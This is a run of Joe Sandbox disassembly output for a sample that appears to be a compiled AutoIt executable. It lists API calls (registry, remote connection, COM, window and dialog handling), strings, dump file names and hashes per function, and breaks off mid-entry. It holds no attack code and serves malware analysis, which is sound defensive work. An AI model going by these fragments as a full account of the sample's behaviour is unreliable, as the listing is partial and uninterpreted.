                                                        • Instruction ID: ea61deead637a89b3266803787d9e08cba0bc8a4f49f147af36d3c8bdc7ae06f
                                                        • Opcode Fuzzy Hash: 4e0b6331add1915c52a8f8b27083fb2bf784a2e10365c87b15f2186616b78142
                                                        • Instruction Fuzzy Hash: 69514C75904309EFCB16CFA9CC85EAEBBB9EF88710F148429FA5997610C731A9408B90
                                                        APIs
                                                          • Part of subcall function 00360957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00346B0C,?,00008000), ref: 00360973
                                                          • Part of subcall function 00344750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00344743,?,?,003437AE,?), ref: 00344770
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00346BAD
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00346CFA
                                                          • Part of subcall function 0034586D: _wcscpy.LIBCMT ref: 003458A5
                                                          • Part of subcall function 0036363D: _iswctype.LIBCMT ref: 00363645
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 537147316-1018226102
                                                        • Opcode ID: 681f881c484f948f7ae6c98ca4defc77760345e62aad2dec38e5bbf1c9ef5605
                                                        • Instruction ID: 60b0c3633761e779dcabc906f9e037a826e1f75196ee75168d2bfb7d448c6bdf
                                                        • Opcode Fuzzy Hash: 681f881c484f948f7ae6c98ca4defc77760345e62aad2dec38e5bbf1c9ef5605
                                                        • Instruction Fuzzy Hash: B802A1315083409FC726EF24C891AAFBBE5EF99314F10491DF4999B2A2DB34E949CB53
                                                        APIs
                                                        • _memset.LIBCMT ref: 003A2D50
                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003A2DDD
                                                        • GetMenuItemCount.USER32(00405890), ref: 003A2E66
                                                        • DeleteMenu.USER32(00405890,00000005,00000000,000000F5,?,?), ref: 003A2EF6
                                                        • DeleteMenu.USER32(00405890,00000004,00000000), ref: 003A2EFE
                                                        • DeleteMenu.USER32(00405890,00000006,00000000), ref: 003A2F06
                                                        • DeleteMenu.USER32(00405890,00000003,00000000), ref: 003A2F0E
                                                        • GetMenuItemCount.USER32(00405890), ref: 003A2F16
                                                        • SetMenuItemInfoW.USER32(00405890,00000004,00000000,00000030), ref: 003A2F4C
                                                        • GetCursorPos.USER32(?), ref: 003A2F56
                                                        • SetForegroundWindow.USER32(00000000), ref: 003A2F5F
                                                        • TrackPopupMenuEx.USER32(00405890,00000000,?,00000000,00000000,00000000), ref: 003A2F72
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003A2F7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 3993528054-0
                                                        • Opcode ID: 2de90735afc916d3f085f8f94331c9d9605d670844d441b4b4bcfa56a3028687
                                                        • Instruction ID: b65d0e660c3b6908785824a2ad278cb162583e289ec5dd8fbfd5ef4dd1780123
                                                        • Opcode Fuzzy Hash: 2de90735afc916d3f085f8f94331c9d9605d670844d441b4b4bcfa56a3028687
                                                        • Instruction Fuzzy Hash: 5171B270600205BEEB269F58DC45FABBF69FF06364F144216F625AA1E1C7716C60DB90
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 003B88D7
                                                        • CoInitialize.OLE32(00000000), ref: 003B8904
                                                        • CoUninitialize.OLE32 ref: 003B890E
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 003B8A0E
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 003B8B3B
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003D2C0C), ref: 003B8B6F
                                                        • CoGetObject.OLE32(?,00000000,003D2C0C,?), ref: 003B8B92
                                                        • SetErrorMode.KERNEL32(00000000), ref: 003B8BA5
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003B8C25
                                                        • VariantClear.OLEAUT32(?), ref: 003B8C35
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID: ,,=
                                                        • API String ID: 2395222682-2941206825
                                                        • Opcode ID: 83621b4678e4821fe6ba61ac336e4cd3c0c2b9bb4386185faf3f7850498704ac
                                                        • Instruction ID: e868af2f9449b5f5743bb1f1d60f29dfe71fd8bd64660629035f618a37d67052
                                                        • Opcode Fuzzy Hash: 83621b4678e4821fe6ba61ac336e4cd3c0c2b9bb4386185faf3f7850498704ac
                                                        • Instruction Fuzzy Hash: 0CC104B1608305AFC702DF64C88496BBBE9FF89748F00495DFA8A9B251DB71ED05CB52
                                                        APIs
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                        • _memset.LIBCMT ref: 0039786B
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003978A0
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003978BC
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003978D8
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00397902
                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0039792A
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00397935
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0039793A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 1411258926-22481851
                                                        • Opcode ID: 6fab71c79cfb133adea5565e42b9c8890ab49cd7f87f3de72e0998739bc5d4de
                                                        • Instruction ID: b5a9df7422a49eba2d4d1085ec9c50316877ab9f3fdf9ce01c311910e6d79f6b
                                                        • Opcode Fuzzy Hash: 6fab71c79cfb133adea5565e42b9c8890ab49cd7f87f3de72e0998739bc5d4de
                                                        • Instruction Fuzzy Hash: 5841DA72C1462DABCF22EBA4DC85DEDB7B9FF04750F414069E915AB1A1DB316D08CB90
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFDAD,?,?), ref: 003C0E31
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: b3a3acecb730c2e9db847ef1fd28780e9b40c54ca102d5bb9807471018430565
                                                        • Instruction ID: 9a00ae2e7d37060d315e90b973c980a99b478621e51a909da028d119bee59392
                                                        • Opcode Fuzzy Hash: b3a3acecb730c2e9db847ef1fd28780e9b40c54ca102d5bb9807471018430565
                                                        • Instruction Fuzzy Hash: 78415C3650028ACBCF1BEF50D892BEF3764AF21340F154419FC959B2A6DB30AD5ACB60
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0037E2A0,00000010,?,Bad directive syntax error,003CF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0039F7C2
                                                        • LoadStringW.USER32(00000000,?,0037E2A0,00000010), ref: 0039F7C9
                                                          • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                        • _wprintf.LIBCMT ref: 0039F7FC
                                                        • __swprintf.LIBCMT ref: 0039F81E
                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0039F88D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 1506413516-4153970271
                                                        • Opcode ID: c6fc4ee84afc586e0b8d4fc48e605840af564879fd065a4a58ef7bbbfbc70c6b
                                                        • Instruction ID: c676967b94f8f4c4b720691f07f72d65a06cfb32ca1645801d3d8d66eef3068c
                                                        • Opcode Fuzzy Hash: c6fc4ee84afc586e0b8d4fc48e605840af564879fd065a4a58ef7bbbfbc70c6b
                                                        • Instruction Fuzzy Hash: 2A213E3290421EAFCF17AF90CC4AEEE7779BF18300F044465F515AA0A2DB71AA18DB50
                                                        APIs
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                          • Part of subcall function 00347924: _memmove.LIBCMT ref: 003479AD
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003A5330
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003A5346
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003A5357
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003A5369
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003A537A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: 44750db9bb879232e8efeb8c98eb24503fee9da31d72fcd652b40114f992f895
                                                        • Instruction ID: 484252ee1ad452a8d6c0b46a3db1ccb8b7fb9fd42969710b192f0bb65af8baec
                                                        • Opcode Fuzzy Hash: 44750db9bb879232e8efeb8c98eb24503fee9da31d72fcd652b40114f992f895
                                                        • Instruction Fuzzy Hash: 80119431A5012D79DB26F762CC4AEFF7BBCEBD2B40F000429B511AA0D1EFA02D04C9A0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: 252b8bb41932ff6c082486af4fa6b2a83487aaed37735caa3f80244ea290f988
                                                        • Instruction ID: c1ca54b317f1237c84f903de9ae544267bf96922dacffe001c6b7921b4cb12cf
                                                        • Opcode Fuzzy Hash: 252b8bb41932ff6c082486af4fa6b2a83487aaed37735caa3f80244ea290f988
                                                        • Instruction Fuzzy Hash: BC11D531504114AFCB16AB309C46EEA77BCEB43711F0581B6F555D6091EFB29D818760
                                                        APIs
                                                        • timeGetTime.WINMM ref: 003A4F7A
                                                          • Part of subcall function 0036049F: timeGetTime.WINMM(?,7694B400,00350E7B), ref: 003604A3
                                                        • Sleep.KERNEL32(0000000A), ref: 003A4FA6
                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 003A4FCA
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003A4FEC
                                                        • SetActiveWindow.USER32 ref: 003A500B
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003A5019
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 003A5038
                                                        • Sleep.KERNEL32(000000FA), ref: 003A5043
                                                        • IsWindow.USER32 ref: 003A504F
                                                        • EndDialog.USER32(00000000), ref: 003A5060
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 49a622af651f7b1490aac3945cd74f8182c4e76cbaf90f0e5cace3bbce4fc272
                                                        • Instruction ID: 0c4af173f652fe2e60c341650bfd648482eb9fd4ec959b021ea9eca28dfab552
                                                        • Opcode Fuzzy Hash: 49a622af651f7b1490aac3945cd74f8182c4e76cbaf90f0e5cace3bbce4fc272
                                                        • Instruction Fuzzy Hash: 24218170205605BFE7139F20FE89E263BAEEB86749F061038F106D52B1CBB19D609F65
                                                        APIs
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                        • CoInitialize.OLE32(00000000), ref: 003AD5EA
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003AD67D
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 003AD691
                                                        • CoCreateInstance.OLE32(003D2D7C,00000000,00000001,003F8C1C,?), ref: 003AD6DD
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003AD74C
                                                        • CoTaskMemFree.OLE32(?,?), ref: 003AD7A4
                                                        • _memset.LIBCMT ref: 003AD7E1
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 003AD81D
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003AD840
                                                        • CoTaskMemFree.OLE32(00000000), ref: 003AD847
                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003AD87E
                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 003AD880
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                        • String ID:
                                                        • API String ID: 1246142700-0
                                                        • Opcode ID: a55a22fa2b29995e3c80f358e85d6a26ed58f92c764da88a87441445a9ee9c6a
                                                        • Instruction ID: 491a315195de51b31f6fc0bc004f02903d5183a3cd448daf0bcf02d85191da8a
                                                        • Opcode Fuzzy Hash: a55a22fa2b29995e3c80f358e85d6a26ed58f92c764da88a87441445a9ee9c6a
                                                        • Instruction Fuzzy Hash: 22B1FA75A00109AFDB05DFA4C889EAEBBF9FF49304F148469E90ADB261DB31ED41CB50
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 0039C283
                                                        • GetWindowRect.USER32(00000000,?), ref: 0039C295
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0039C2F3
                                                        • GetDlgItem.USER32(?,00000002), ref: 0039C2FE
                                                        • GetWindowRect.USER32(00000000,?), ref: 0039C310
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0039C364
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0039C372
                                                        • GetWindowRect.USER32(00000000,?), ref: 0039C383
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0039C3C6
                                                        • GetDlgItem.USER32(?,000003EA), ref: 0039C3D4
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0039C3F1
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0039C3FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: b78ae0ea75e682d74c65d3ff3a96b2a340042ab13007e1ae0047397fac85d229
                                                        • Instruction ID: 4165305b74f439ec945acedc083afcd5280860adf923a89363d4e2b14f6e17ba
                                                        • Opcode Fuzzy Hash: b78ae0ea75e682d74c65d3ff3a96b2a340042ab13007e1ae0047397fac85d229
                                                        • Instruction Fuzzy Hash: B6514E71B10205AFDF19CFA9DD99EAEBBBAEB88710F14852DF515D7290D770AD008B10
                                                        APIs
                                                          • Part of subcall function 00341B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00342036,?,00000000,?,?,?,?,003416CB,00000000,?), ref: 00341B9A
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003420D3
                                                        • KillTimer.USER32(-00000001,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0034216E
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0037BCA6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BCD7
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BCEE
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BD0A
                                                        • DeleteObject.GDI32(00000000), ref: 0037BD1C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: 516e1575af72b03777e960b811bb51c17de735356632651c1f0fc8fb6013d682
                                                        • Instruction ID: 17555bf521f8a46a53e562194c4e03ad711e2f879e9ed45f5393c9efa8414972
                                                        • Opcode Fuzzy Hash: 516e1575af72b03777e960b811bb51c17de735356632651c1f0fc8fb6013d682
                                                        • Instruction Fuzzy Hash: 8B616832100A10DFDB37AF14DA48B2BB7F6FB40316F918529E546ABA60C774B891DF54
                                                        APIs
                                                          • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                                        • GetSysColor.USER32(0000000F), ref: 003421D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: be06da1ad8080fd9cea4520ac7167fc424d62250d39c1a8d1fe8a7aef03bd212
                                                        • Instruction ID: be86ec5145b063d98bef77f5641fcbbcc064999d1590c9c8f9d140691787faba
                                                        • Opcode Fuzzy Hash: be06da1ad8080fd9cea4520ac7167fc424d62250d39c1a8d1fe8a7aef03bd212
                                                        • Instruction Fuzzy Hash: 1841C431000554DFDB635F28EC88BBA3BAAEB06331F598265FE659E1E1C771AC41DB21
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,003CF910), ref: 003AA90B
                                                        • GetDriveTypeW.KERNEL32(00000061,003F89A0,00000061), ref: 003AA9D5
                                                        • _wcscpy.LIBCMT ref: 003AA9FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
